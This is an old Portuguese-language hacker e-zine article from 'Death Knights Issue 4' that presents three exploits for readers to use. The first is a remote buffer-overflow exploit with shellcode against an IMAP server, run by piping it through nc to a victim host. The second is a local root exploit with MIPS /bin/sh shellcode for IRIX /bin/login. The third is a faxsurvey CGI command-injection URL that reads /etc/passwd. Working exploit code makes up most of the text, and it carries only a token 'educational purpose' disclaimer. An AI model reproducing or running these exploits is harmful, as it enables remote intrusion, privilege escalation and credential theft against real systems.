Exploits - CGI & Stuff
Death Knights Issue 4
by ReNeGaDe
Mais uma para voces! Para tentar um exploit, e' melhor ter uma conta no seu alvo (se possivel). Aqui irao alguns poucos exploits pra voce se divertir! E tambem ah falha de cgi para get passwd do faxsurvey.
1) Exploit para novo bug do imap..
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/*
* Here goes another imap remote exploit
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* hey kiddies, it's 4 linux ! :)
* play around but be nice and careful - test it only against your own machine
* this code is only for educational purpose.
*
* renegade:~# (./imaprulez 100; cat) | nc victim.org 143
* (you can provide an offset or use the default 100)
*
* thanks for c0nd0r - condor@uground.org
*
* this code is heavly based on Cheez Whiz code
* So give him the credit : cheezbeast@hotmail.com
* I just found out the esp and fix things up
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>
#define BUFLEN (2*1024)
#define NOP 0x90
char shell[] =
"\xeb\x34\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
"\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x7f"
"\x20\x46\x01\x20\x46\x02\x20\x46\x03\x20\x46\x05\x20\x46\x06"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc7\xff\xff\xff"
"\x2f\xe2\xe9\xee\x2f\xf3\xe8\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
char buf[BUFLEN];
unsigned long int nop, esp;
long int offset;
void
main (int argc, char *argv[])
{
int i;
nop = 403; offset = 100;
if (argc > 2) nop = atoi(argv[2]);
if (argc > 1) offset = atoi(argv[1]);
esp = 0xbffff501;
memset(buf, NOP, BUFLEN);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
*((int *) &buf[i]) = esp + offset;
printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
for (i = 0; i < BUFLEN; i++)
putchar(buf[i]);
printf("\r\n");
return;
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
2) Um buffer overflow para voce! Em /bin/login.
O que acontece usuarios locais podem pegar root access. Sistemas vulneraveis Irix 5.3 Irix64 6.2 Irix 6.3.
Solucao temporaria: chmod u-s /bin/login
Compile o exploit usando '-n32' flag pra compiling under 6.x
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/* /bin/login exploit by DCRH 24/5/97
*
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* Tested on: R3000 Indigo (Irix 5.3)
* R4400 Indy (Irix 5.3)
* R5000 O2 (Irix 6.3)
* R8000 Power Challenge (Irix 6.2)
*
* Compile as: cc -n32 login.c (for Irix 6.x)
* cc login.c (for Irix 5.x)
*
* Press enter when prompted for a password
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 200
#define EXTRA 300
#define OFFSET 0x1b0
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */
#define u_long unsigned
u_long get_sp_code[] = {
0x03a01025, /* move $v0,$sp */
0x03e00008, /* jr $ra */
0x00000000, /* nop */
};
u_long irix_shellcode[] = {
0x24041234, /* li $4,0x1234 */
0x2084edcc, /* sub $4,0x1234 */
0x0491fffe, /* bgezal $4,pc-4 */
0x03bd302a, /* sgt $6,$sp,$sp */
0x23e4012c, /* addi $4,$31,264+36 */
0xa086feff, /* sb $6,-264+7($4) */
0x2084fef8, /* sub $4,264 */
0x20850110, /* addi $5,$4,264+8 */
0xaca4fef8, /* sw $4,-264($5) */
0xaca6fefc, /* sw $4,-260($5) */
0x20a5fef8, /* sub $5, 264 */
0x240203f3, /* li $v0,1011 */
0x03ffffcc, /* syscall 0xfffff */
0x2f62696e, /* "/bin" */
0x2f7368ff, /* "/sh" */
};
char buf[BUF_LENGTH + EXTRA + 8];
void main(int argc, char **argv)
{
char *env[] = {NULL};
u_long targ_addr, stack;
u_long *long_p;
int i, code_length = strlen((char *)irix_shellcode)+1;
u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;
stack = get_sp();
long_p =(u_long *) buf;
targ_addr = stack + OFFSET;
if (argc > 1)
targ_addr += atoi(argv[1]);
while ((targ_addr & 0xff000000) == 0 ||
(targ_addr & 0x00ff0000) == 0 ||
(targ_addr & 0x0000ff00) == 0 ||
(targ_addr & 0x000000ff) == 0)
targ_addr += 4;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = IRIX_NOP;
for (i = 0; i < code_length/sizeof(u_long); i++)
*long_p++ = irix_shellcode[i];
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = (targ_addr << 24) | (targ_addr >> 8);
*long_p = 0;
printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);
execle("/bin/login", "login", "-h", &buf[1], 0, env);
perror("execl failed");
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
3) Falha de cgi no 'faxsurvey' CGI-Script...
"http://vitima.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd"
Eh isso ae pessoal aqui se encerram minhas materias nessa TDK!
Se tiverem interesse em tirar duvidas ou apresentar novas ideias, aqui estah o meu email. Mais sem babozeiras hein pessoal vamos ter um bom senso pois nao sou desocupado.
cya l8er!
ReNeGaDe renegade@deathknights.com
`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`'`